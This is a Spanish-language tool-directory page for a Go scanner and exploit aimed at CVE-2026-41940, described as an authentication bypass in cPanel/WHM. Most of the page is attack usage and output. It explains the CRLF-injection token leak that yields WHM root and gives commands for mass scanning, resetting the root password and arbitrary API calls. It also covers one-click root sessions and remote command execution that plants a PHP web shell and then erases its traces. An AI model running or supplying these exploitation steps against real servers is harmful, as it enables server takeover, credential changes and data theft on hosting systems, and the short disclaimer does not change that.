Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cPanelWHM-AuthBypass — Herramienta de escaneo y explotación basada en Go para CVE-2026-41940, una omisión de autenticación en cPanel/WHM. Admite escaneo por lotes, fuga de tokens y acciones posteriores a la explotación como RCE, cambio de contraseña y llamadas a la API. | Kitploit
Herramientas/GitHubGitHub/kagantua/cpanelwhm-authbypass
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónRed Teaming
GitHubkagantua/cpanelwhm-authbypass

cPanelWHM-AuthBypass

Herramienta de escaneo y explotación basada en Go para CVE-2026-41940, una omisión de autenticación en cPanel/WHM. Admite escaneo por lotes, fuga de tokens y acciones posteriores a la explotación como RCE, cambio de contraseña y llamadas a la API.

Ver Repositorio
107hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Herramienta de Escaneo y Explotación de Bypass de Autenticación cPanel/WHM

Herramienta de línea de comandos en Go reescrita a partir del PoC en Python de watchTowr, utilizada para detectar y explotar la vulnerabilidad de bypass de autenticación CVE-2026-41940 en cPanel/WHM.

Resumen de la Vulnerabilidad

CVE-2026-41940 es una vulnerabilidad de bypass de autenticación en cPanel/WHM. La cadena de ataque inyecta CRLF en el encabezado Basic Auth, filtrando el token de seguridad y obteniendo privilegios root de WHM.

Cadena de ataque en 4 fases:

  1. Preautenticación — Enviar credenciales incorrectas a /login/ para obtener la cookie whostmgrsession original
  2. Inyección CRLF — Inyectar caracteres de nueva línea a través del encabezado Authorization: Basic, induciendo al servidor a filtrar el token de seguridad cpsess en el encabezado Location de la redirección 307
  • Propagación del token — Activar do_token_denied para propagar los datos de autenticación inyectados del almacenamiento original a la caché
  • Verificación de privilegios — Usar el token filtrado para acceder a /json-api/version y verificar si se obtuvieron privilegios root
  • Características

    • Escaneo masivo — Detecta objetivos desde un archivo con ejecución concurrente
    • Detección de objetivo único — Verificación rápida especificando una sola URL
    • Procesamiento inteligente de URL — Compatibilidad automática con http://, https://, formatos sin protocolo, y deduplicación automática
    • Explotación
      • Cambiar la contraseña de root (-passwd)
      • Invocar cualquier API de WHM (-api)
      • Generar URL de inicio de sesión con un clic (-session)
      • Ejecución remota de comandos / RCE (-cmd)
    • Resaltado en terminal — [VULN] en rojo, [SAFE] en verde
    • Guardado de resultados — Las URL vulnerables se guardan automáticamente en un archivo

    Compilación

    root@kitploit:~
    # Requiere Go 1.20+
    cd cpanel-checker
    go build -o cpanel-checker .
    

    Uso

    Resumen de parámetros

    ParámetroDescripciónEjemplo
    -uURL de objetivo único-u https://1.2.3.4:2087
    -fArchivo que contiene la lista de URL-f targets.txt
    -oRuta del archivo de salida (por defecto result.txt)-o vuln.txt
    -cNúmero de concurrencia (por defecto 10)-c 20
    -hostnameEspecificar manualmente el encabezado Host (por defecto detección automática)-hostname cpanel.example.com
    -passwdCambiar la contraseña de root (solo modo -u)-passwd NewP@ss123
    -apiInvocar función de API de WHM (solo modo -u)-api listaccts
    -api-paramsParámetros de la API de WHM, separados por comas-api-params user=root,password=123
    -sessionGenerar URL de inicio de sesión root con un clic (solo modo -u)-session
    -keepConservar la cuenta temporal de RCE sin eliminar (con -cmd)-keep
    -cmdEjecutar comando remoto / RCE (solo modo -u)-cmd "id"

    1. Detección de objetivo único

    root@kitploit:~
    ./cpanel-checker -u https://target:2087
    

    El puerto por defecto es 2087; las siguientes formas son equivalentes:

    root@kitploit:~
    ./cpanel-checker -u https://target
    ./cpanel-checker -u target
    

    2. Escaneo masivo

    root@kitploit:~
    ./cpanel-checker -f targets.txt -c 20
    

    targets.txt admite los siguientes formatos (una por línea, las líneas que comienzan con # son comentarios):

    root@kitploit:~
    https://1.1.1.1:2087
    http://2.2.2.2:2087
    3.3.3.3:2087
    4.4.4.4
    # Esto es un comentario
    
    • Deduplicación automática: http://1.1.1.1 y https://1.1.1.1 se consideran el mismo objetivo y solo se escanean una vez
    • Las direcciones sin protocolo se completan automáticamente con https://
    • Las direcciones sin puerto usan automáticamente 2087
    • Los resultados se guardan en result.txt (personalizable con -o)

    3. Cambiar la contraseña de root

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -passwd "NewP@ssw0rd!"
    

    4. Invocar cualquier API de WHM

    root@kitploit:~
    # Listar todas las cuentas
    ./cpanel-checker -u https://target:2087 -api listaccts
    
    # Invocar con parámetros
    ./cpanel-checker -u https://target:2087 -api passwd -api-params "user=root,password=abc123"
    

    5. Generar URL de inicio de sesión con un clic

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -session
    

    Genera una URL que, al abrirse en el navegador, da acceso al panel de administración de WHM. En el panel, use la función Terminal para obtener un shell root interactivo.

    Nota: -session es semiautomático — la herramienta genera la URL de inicio de sesión y usted debe abrirla manualmente en el navegador.

    6. Ejecución remota de comandos (RCE)

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -cmd "id"
    

    Agregue -keep para conservar la cuenta temporal y poder iniciar sesión en el panel de cPanel:

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -cmd "id" -keep
    

    Con -keep, la salida incluirá el nombre de usuario, la contraseña y la dirección de inicio de sesión de cPanel (https://host:2083) de la cuenta temporal; use estas credenciales directamente para iniciar sesión en el panel de cPanel.

    -cmd es totalmente automático y no requiere otras operaciones manuales. Flujo interno:

    1. Obtener privilegios root mediante el bypass de autenticación
    2. Crear una cuenta temporal de cPanel a través de la API de WHM
    3. Escribir un shell PHP en ~/public_html/ mediante UAPI (Fileman::save_file_content)
    4. Acceder a https://host/~tmpuser/shell.php a través de HTTP para ejecutar comandos
    5. Devolver la salida del comando
    6. Eliminar automáticamente la cuenta temporal (limpiar rastros)

    Requisito previo: los puertos 80 o 443 del objetivo deben ser accesibles y Apache/httpd debe estar en ejecución.

    7. Uso combinado

    Se pueden usar varios parámetros de explotación simultáneamente:

    root@kitploit:~
    # Obtener URL de inicio de sesión, ejecutar comando y cambiar contraseña al mismo tiempo
    ./cpanel-checker -u https://target:2087 -session -cmd "id" -passwd "NewP@ss123"
    

    8. Especificar manualmente el encabezado Host

    Cuando la IP del objetivo no coincide con el nombre de host configurado en cPanel, se puede especificar manualmente:

    root@kitploit:~
    ./cpanel-checker -u https://1.2.3.4:2087 -hostname cpanel.example.com
    

    Por defecto, la herramienta descubre automáticamente el nombre de host correcto mediante la redirección 307 de /openid_connect/cpanelid.

    Ejemplo de salida

    Escaneo masivo

    root@kitploit:~
    [1/5] [VULN] https://1.1.1.1:2087 - token=/cpsess1234567890
    [2/5] [SAFE] https://2.2.2.2:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched
    [3/5] [SAFE] https://3.3.3.3:2087 - stage1: request failed: dial tcp: i/o timeout
    [4/5] [VULN] https://4.4.4.4:2087 - token=/cpsess0987654321
    [5/5] [SAFE] https://5.5.5.5:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched
    
    ========== Escaneo completado ==========
    Total: 5 | Vulnerables: 2
    
      ● https://1.1.1.1:2087
      ● https://4.4.4.4:2087
    
    [+] Resultados guardados en result.txt
    

    Ejecución de RCE

    root@kitploit:~
    [*] Objetivo: https://target:2087
    [*] Modo: Explotación
    
    [0] hostname = cpanel.example.com
    [1] minting a preauth session...
        session base = abc123def456
    [2] sending the CRLF injection (Basic auth + no-ob cookie)...
        leaked token = /cpsess1234567890
    [3] firing do_token_denied to propagate raw -> cache...
        gadget fired
    [4] verifying we're WHM root...
    [+] Se obtuvieron privilegios root de WHM
    
    [*] Ejecutando comando remoto (RCE)...
        [a] Creando cuenta temporal: tmpabcde
        [b] Escribiendo shell: /home/tmpabcde/public_html/random.php
        [c] Ejecutando comando: id
        [d] Limpiando cuenta temporal: tmpabcde
    [+] Salida del comando:
    uid=0(root) gid=0(root) groups=0(root)
    
    [+] Completado. https://target:2087 ha sido comprometido
    

    Notas

    • Los parámetros de explotación (-passwd, -api, -session, -cmd) solo están disponibles en el modo de objetivo único -u; no se admiten en el modo masivo -f
    • La herramienta omite la verificación de certificados TLS por defecto
    • El tiempo de espera de las solicitudes es de 15 segundos
    • Las líneas que comienzan con # en el archivo de URL se ignoran

    Descargo de responsabilidad

    Esta herramienta está destinada únicamente a pruebas de seguridad autorizadas e investigación. Probar sistemas sin autorización es ilegal. El usuario debe asegurarse de haber obtenido la autorización escrita explícita del propietario del sistema objetivo. El autor no se hace responsable de ningún uso indebido.

    Agradecimientos

    • PoC original: watchTowr / Sina Kheirkhah (@SinSinology)
    • CVE: CVE-2026-41940
    Descargar herramienta